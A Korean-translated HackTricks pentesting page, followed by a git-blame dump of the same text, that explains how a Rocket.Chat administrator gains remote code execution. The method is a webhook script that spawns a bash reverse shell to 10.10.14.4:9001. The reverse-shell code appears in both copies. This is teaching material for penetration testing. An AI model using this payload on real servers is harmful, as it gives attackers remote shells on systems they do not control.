hacktricks/network-services-pentesting/pentesting-web/rocket-chat.md

# Rocket Chat

<details>

<summary><strong>htARTE (HackTricks AWS Red Team 전문가)로부터 AWS 해킹을 처음부터 전문가까지 배우세요!</strong></summary>

HackTricks를 지원하는 다른 방법:

* **회사가 HackTricks에 광고되길 원하거나 PDF로 HackTricks를 다운로드하고 싶다면** [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구매하세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* 💬 [**Discord 그룹**](https://discord.gg/hRep4RUj7f) 또는 [**텔레그램 그룹**](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)를 **팔로우**하세요.
* **해킹 트릭을 공유하려면** [**HackTricks**](https://github.com/carlospolop/hacktricks) 및 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 저장소에 PR을 제출하세요.

</details>

<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>

{% embed url="https://websec.nl/" %}


## RCE

만약 Rocket Chat 내에서 관리자라면 RCE를 얻을 수 있습니다.

* **`Integrations`**로 이동하고 **`New Integration`**을 선택하고 **`Incoming WebHook`** 또는 **`Outgoing WebHook`** 중 하나를 선택합니다.
* `/admin/integrations/incoming`

<figure><img src="../../.gitbook/assets/image (263).png" alt=""><figcaption></figcaption></figure>

* [문서](https://docs.rocket.chat/guides/administration/admin-panel/integrations)에 따르면 둘 다 ES2015 / ECMAScript 6 ([기본적으로 JavaScript](https://codeburst.io/javascript-wtf-is-es6-es8-es-2017-ecmascript-dca859e4821c))를 사용하여 데이터를 처리합니다. 그래서 [노드JS를 위한 rev 쉘](../../generic-methodologies-and-resources/shells/linux.md#nodejs)을 가져오겠습니다.
```javascript
const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
```
* 웹훅 구성 (채널 및 게시물의 사용자 이름이 있어야 함):

<figure><img src="../../.gitbook/assets/image (902).png" alt=""><figcaption></figcaption></figure>

* 웹훅 스크립트 구성:

<figure><img src="../../.gitbook/assets/image (569).png" alt=""><figcaption></figcaption></figure>

* 변경 사항 저장
* 생성된 웹훅 URL 가져오기:

<figure><img src="../../.gitbook/assets/image (934).png" alt=""><figcaption></figcaption></figure>

* curl로 호출하면 rev 쉘을 받아야 함


<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>

{% embed url="https://websec.nl/" %}

<details>

<summary><strong>제로부터 AWS 해킹을 전문가로 학습하세요</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

HackTricks를 지원하는 다른 방법:

* **회사를 HackTricks에서 광고하거나 PDF로 다운로드하려면** [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구매하세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* 💬 [**디스코드 그룹**](https://discord.gg/hRep4RUj7f) 또는 [**텔레그램 그룹**](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**를 팔로우**하세요.
* **HackTricks** 및 **HackTricks Cloud** github 저장소에 PR을 제출하여 해킹 트릭을 공유하세요.

</details>
GITBOOK-3838: change request with no subject merged in GitBook 2023-03-28 11:38:04 +00:00			`# Rocket Chat`

			`<details>`

Translated ['binary-exploitation/rop-return-oriented-programing/ret2lib/ 2024-04-07 23:01:30 +00:00			`<summary><strong>htARTE (HackTricks AWS Red Team 전문가)로부터 AWS 해킹을 처음부터 전문가까지 배우세요!</strong></summary>`
GITBOOK-3838: change request with no subject merged in GitBook 2023-03-28 11:38:04 +00:00
Translated to Korean 2024-02-10 21:30:13 +00:00			`HackTricks를 지원하는 다른 방법:`
arte 2023-12-31 01:24:39 +00:00
Translated ['binary-exploitation/rop-return-oriented-programing/ret2lib/ 2024-04-07 23:01:30 +00:00			`* 회사가 HackTricks에 광고되길 원하거나 PDF로 HackTricks를 다운로드하고 싶다면 [구독 요금제](https://github.com/sponsors/carlospolop)를 확인하세요!`
			`* [공식 PEASS & HackTricks 스왜그](https://peass.creator-spring.com)를 구매하세요`
			`* [The PEASS Family](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [NFTs](https://opensea.io/collection/the-peass-family) 컬렉션`
			`* 💬 [Discord 그룹](https://discord.gg/hRep4RUj7f) 또는 [텔레그램 그룹](https://t.me/peass)에 가입하거나 트위터 🐦 [@carlospolopm](https://twitter.com/hacktricks\_live)를 팔로우하세요.`
			`* 해킹 트릭을 공유하려면 [HackTricks](https://github.com/carlospolop/hacktricks) 및 [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github 저장소에 PR을 제출하세요.`
GITBOOK-3838: change request with no subject merged in GitBook 2023-03-28 11:38:04 +00:00
			`</details>`

Translated ['binary-exploitation/rop-return-oriented-programing/ret2lib/ 2024-04-07 23:01:30 +00:00			`<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>`

			`{% embed url="https://websec.nl/" %}`


GITBOOK-3838: change request with no subject merged in GitBook 2023-03-28 11:38:04 +00:00			`## RCE`

Translated ['binary-exploitation/rop-return-oriented-programing/ret2lib/ 2024-04-07 23:01:30 +00:00			`만약 Rocket Chat 내에서 관리자라면 RCE를 얻을 수 있습니다.`
GITBOOK-3838: change request with no subject merged in GitBook 2023-03-28 11:38:04 +00:00
Translated ['binary-exploitation/rop-return-oriented-programing/ret2lib/ 2024-04-07 23:01:30 +00:00			* `Integrations`로 이동하고 `New Integration`을 선택하고 `Incoming WebHook` 또는 `Outgoing WebHook` 중 하나를 선택합니다.
Translated to Korean 2024-02-10 21:30:13 +00:00			* `/admin/integrations/incoming`
GITBOOK-3838: change request with no subject merged in GitBook 2023-03-28 11:38:04 +00:00
Translated ['binary-exploitation/rop-return-oriented-programing/ret2lib/ 2024-04-07 23:01:30 +00:00			`<figure><img src="../../.gitbook/assets/image (263).png" alt=""><figcaption></figcaption></figure>`
GITBOOK-3838: change request with no subject merged in GitBook 2023-03-28 11:38:04 +00:00
Translated ['binary-exploitation/rop-return-oriented-programing/ret2lib/ 2024-04-07 23:01:30 +00:00			`* [문서](https://docs.rocket.chat/guides/administration/admin-panel/integrations)에 따르면 둘 다 ES2015 / ECMAScript 6 ([기본적으로 JavaScript](https://codeburst.io/javascript-wtf-is-es6-es8-es-2017-ecmascript-dca859e4821c))를 사용하여 데이터를 처리합니다. 그래서 [노드JS를 위한 rev 쉘](../../generic-methodologies-and-resources/shells/linux.md#nodejs)을 가져오겠습니다.`
GITBOOK-3838: change request with no subject merged in GitBook 2023-03-28 11:38:04 +00:00			```javascript
			`const require = console.log.constructor('return process.mainModule.require')();`
			`const { exec } = require('child_process');`
			`exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")`
			```
Translated ['binary-exploitation/rop-return-oriented-programing/ret2lib/ 2024-04-07 23:01:30 +00:00			`* 웹훅 구성 (채널 및 게시물의 사용자 이름이 있어야 함):`

			`<figure><img src="../../.gitbook/assets/image (902).png" alt=""><figcaption></figcaption></figure>`

			`* 웹훅 스크립트 구성:`

			`<figure><img src="../../.gitbook/assets/image (569).png" alt=""><figcaption></figcaption></figure>`
GITBOOK-3838: change request with no subject merged in GitBook 2023-03-28 11:38:04 +00:00
Translated ['binary-exploitation/rop-return-oriented-programing/ret2lib/ 2024-04-07 23:01:30 +00:00			`* 변경 사항 저장`
			`* 생성된 웹훅 URL 가져오기:`
GITBOOK-3838: change request with no subject merged in GitBook 2023-03-28 11:38:04 +00:00
Translated ['binary-exploitation/rop-return-oriented-programing/ret2lib/ 2024-04-07 23:01:30 +00:00			`<figure><img src="../../.gitbook/assets/image (934).png" alt=""><figcaption></figcaption></figure>`
GITBOOK-3838: change request with no subject merged in GitBook 2023-03-28 11:38:04 +00:00
Translated ['binary-exploitation/rop-return-oriented-programing/ret2lib/ 2024-04-07 23:01:30 +00:00			`* curl로 호출하면 rev 쉘을 받아야 함`
GITBOOK-3838: change request with no subject merged in GitBook 2023-03-28 11:38:04 +00:00

Translated ['binary-exploitation/rop-return-oriented-programing/ret2lib/ 2024-04-07 23:01:30 +00:00			`<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>`
GITBOOK-3838: change request with no subject merged in GitBook 2023-03-28 11:38:04 +00:00
Translated ['binary-exploitation/rop-return-oriented-programing/ret2lib/ 2024-04-07 23:01:30 +00:00			`{% embed url="https://websec.nl/" %}`
GITBOOK-3838: change request with no subject merged in GitBook 2023-03-28 11:38:04 +00:00
			`<details>`

Translated ['binary-exploitation/rop-return-oriented-programing/ret2lib/ 2024-04-07 23:01:30 +00:00			`<summary><strong>제로부터 AWS 해킹을 전문가로 학습하세요</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
GITBOOK-3838: change request with no subject merged in GitBook 2023-03-28 11:38:04 +00:00
Translated to Korean 2024-02-10 21:30:13 +00:00			`HackTricks를 지원하는 다른 방법:`
arte 2023-12-31 01:24:39 +00:00
Translated ['binary-exploitation/rop-return-oriented-programing/ret2lib/ 2024-04-07 23:01:30 +00:00			`* 회사를 HackTricks에서 광고하거나 PDF로 다운로드하려면 [구독 요금제](https://github.com/sponsors/carlospolop)를 확인하세요!`
			`* [공식 PEASS & HackTricks 스왜그](https://peass.creator-spring.com)를 구매하세요`
			`* [The PEASS Family](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [NFTs](https://opensea.io/collection/the-peass-family) 컬렉션`
			`* 💬 [디스코드 그룹](https://discord.gg/hRep4RUj7f) 또는 [텔레그램 그룹](https://t.me/peass)에 가입하거나 트위터 🐦 [@carlospolopm](https://twitter.com/hacktricks\_live)를 팔로우하세요.`
			`* HackTricks 및 HackTricks Cloud github 저장소에 PR을 제출하여 해킹 트릭을 공유하세요.`
GITBOOK-3838: change request with no subject merged in GitBook 2023-03-28 11:38:04 +00:00
			`</details>`